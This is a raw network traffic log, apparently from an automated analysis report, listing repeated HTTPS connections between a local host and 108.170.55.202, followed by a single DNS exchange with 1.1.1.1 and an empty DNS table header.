                                                                                    Oct 14, 2024 04:30:45.583411932 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.583497047 CEST44350151108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.583600044 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.584055901 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.584122896 CEST44350151108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.584192038 CEST50151443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595109940 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595194101 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:45.595290899 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595693111 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:45.595727921 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.267797947 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.267885923 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.270446062 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.270463943 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.270796061 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.274719000 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.319399118 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.522675991 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.522861004 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.522939920 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.523056030 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.523098946 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.523128033 CEST50153443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.523143053 CEST44350153108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.783591986 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.783669949 CEST44350159108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.783857107 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.784327984 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.784430027 CEST44350159108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.784842968 CEST50159443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.803599119 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.803683043 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:46.803777933 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.804363966 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:46.804404020 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.506198883 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.506469011 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.508394957 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.508450031 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.509493113 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.511292934 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.555497885 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.762332916 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.762666941 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.762904882 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.763000965 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.763001919 CEST50160443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:47.763045073 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:47.763075113 CEST44350160108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.013079882 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.013178110 CEST44350161108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.013335943 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.013511896 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.013907909 CEST44350161108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.013998985 CEST50161443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.035841942 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.035924911 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.036029100 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.036547899 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.036602974 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.628721952 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.628981113 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.713902950 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.713957071 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.714900017 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.716402054 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.763451099 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.883112907 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.883517027 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.883596897 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.884845018 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.884888887 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:48.884924889 CEST50162443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:48.884939909 CEST44350162108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:59.320410013 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:59.930042028 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:59.930213928 CEST50182443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:59.931190968 CEST50182443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:59.931220055 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:59.931574106 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:30:59.932635069 CEST50182443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:30:59.975446939 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.186558008 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.186917067 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.187016010 CEST50182443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.187129974 CEST50182443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.187172890 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.187211037 CEST50182443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.187226057 CEST44350182108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.387943029 CEST50183443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.388046026 CEST44350183108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.388170004 CEST50183443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.391273975 CEST50183443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.391437054 CEST44350183108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.391545057 CEST50183443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.401580095 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.401664019 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.401781082 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.402376890 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.402455091 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.993446112 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.993686914 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.994690895 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:00.994745016 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.995563030 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:00.997014999 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.043436050 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.245693922 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.246026993 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.246217966 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.246315956 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.246316910 CEST50184443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.246359110 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.246387005 CEST44350184108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.446427107 CEST50185443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.446542978 CEST44350185108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.446645975 CEST50185443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.446712971 CEST50185443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.446877956 CEST44350185108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.446945906 CEST50185443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.459016085 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.459044933 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:01.459132910 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.459418058 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:01.459445000 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.070369959 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.070473909 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.071602106 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.071626902 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.071960926 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.073146105 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.115444899 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.326291084 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.326643944 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.326723099 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.326860905 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.326913118 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.326961040 CEST50186443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.326975107 CEST44350186108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.580547094 CEST50187443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.580636024 CEST44350187108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.580724001 CEST50187443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.983686924 CEST50187443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:02.983803988 CEST44350187108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:02.983886003 CEST50187443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.003674030 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.003710032 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.003792048 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.004035950 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.004055023 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.587407112 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.587512970 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.589229107 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.589242935 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.589575052 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.590631962 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.635410070 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.843339920 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.843477011 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.843537092 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.843693972 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.843708038 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:03.843724012 CEST50188443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:03.843729973 CEST44350188108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.039463043 CEST50189443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.039514065 CEST44350189108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.039721012 CEST50189443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.039799929 CEST50189443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.039911032 CEST44350189108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.039974928 CEST50189443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.050573111 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.050597906 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.050677061 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.051127911 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.051158905 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.653623104 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.653776884 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.656076908 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.656105995 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.656465054 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.657979012 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.699481010 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.912358046 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.912516117 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.912578106 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.912770033 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.912817955 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:04.912848949 CEST50190443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:04.912866116 CEST44350190108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.114358902 CEST50191443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.114402056 CEST44350191108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.114496946 CEST50191443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.114609957 CEST50191443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.114671946 CEST44350191108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.114732981 CEST50191443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.131640911 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.131722927 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.131844044 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.132101059 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.132138968 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.828412056 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.828610897 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.830272913 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.830327988 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.830687046 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:05.831849098 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:05.879447937 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.083626032 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.083808899 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.084067106 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.084067106 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.084068060 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.289433956 CEST50193443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.289530993 CEST44350193108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.289699078 CEST50193443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.289884090 CEST50193443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.289952993 CEST44350193108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.290020943 CEST50193443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.301095009 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.301119089 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.301305056 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.301609039 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.301640034 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.396317959 CEST50192443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.396378994 CEST44350192108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.974030018 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.974133968 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.975343943 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:06.975372076 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.975718975 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:06.977201939 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.023439884 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.228037119 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.228224039 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.228338003 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.228491068 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.228533983 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.228559971 CEST50194443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.228575945 CEST44350194108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.494824886 CEST50195443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.494915962 CEST44350195108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.495003939 CEST50195443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.495121956 CEST50195443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.495265961 CEST44350195108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.495335102 CEST50195443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.506601095 CEST50196443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.506685972 CEST44350196108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:07.506772995 CEST50196443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.507138968 CEST50196443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:07.507224083 CEST44350196108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:08.098481894 CEST44350196108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:08.098831892 CEST50196443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:08.100836039 CEST50196443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:08.100864887 CEST44350196108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:08.101212978 CEST44350196108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:08.104535103 CEST50196443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655136108 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655208111 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:18.655312061 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655641079 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:18.655658960 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.255503893 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.255681038 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.256958008 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.256989002 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.257790089 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.259084940 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.299413919 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509145021 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509527922 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509637117 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.509768009 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.509768009 CEST50216443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.509821892 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.509850025 CEST44350216108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.705271006 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.705315113 CEST44350217108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.705404043 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.705504894 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.705629110 CEST44350217108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.705883980 CEST50217443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716202974 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716214895 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:19.716279030 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716540098 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:19.716553926 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.328783989 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.328866959 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.330528975 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.330544949 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.330780029 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.331850052 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.379405975 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.588820934 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.588995934 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.589224100 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.589562893 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.589587927 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.589621067 CEST50218443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.589627981 CEST44350218108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.795614958 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.795660973 CEST44350219108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.795730114 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.795887947 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.795934916 CEST44350219108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.796045065 CEST50219443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.814584017 CEST50220443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.814642906 CEST44350220108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:20.814790964 CEST50220443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.815037012 CEST50220443192.168.2.4108.170.55.202
                                                                                    Oct 14, 2024 04:31:20.815073967 CEST44350220108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:21.405493021 CEST44350220108.170.55.202192.168.2.4
                                                                                    Oct 14, 2024 04:31:21.405574083 CEST50220443192.168.2.4108.170.55.202
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 04:29:18.207295895 CEST | 49297 | 53 | 192.168.2.4 | 1.1.1.1
Oct 14, 2024 04:29:18.518568039 CEST | 53 | 49297 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
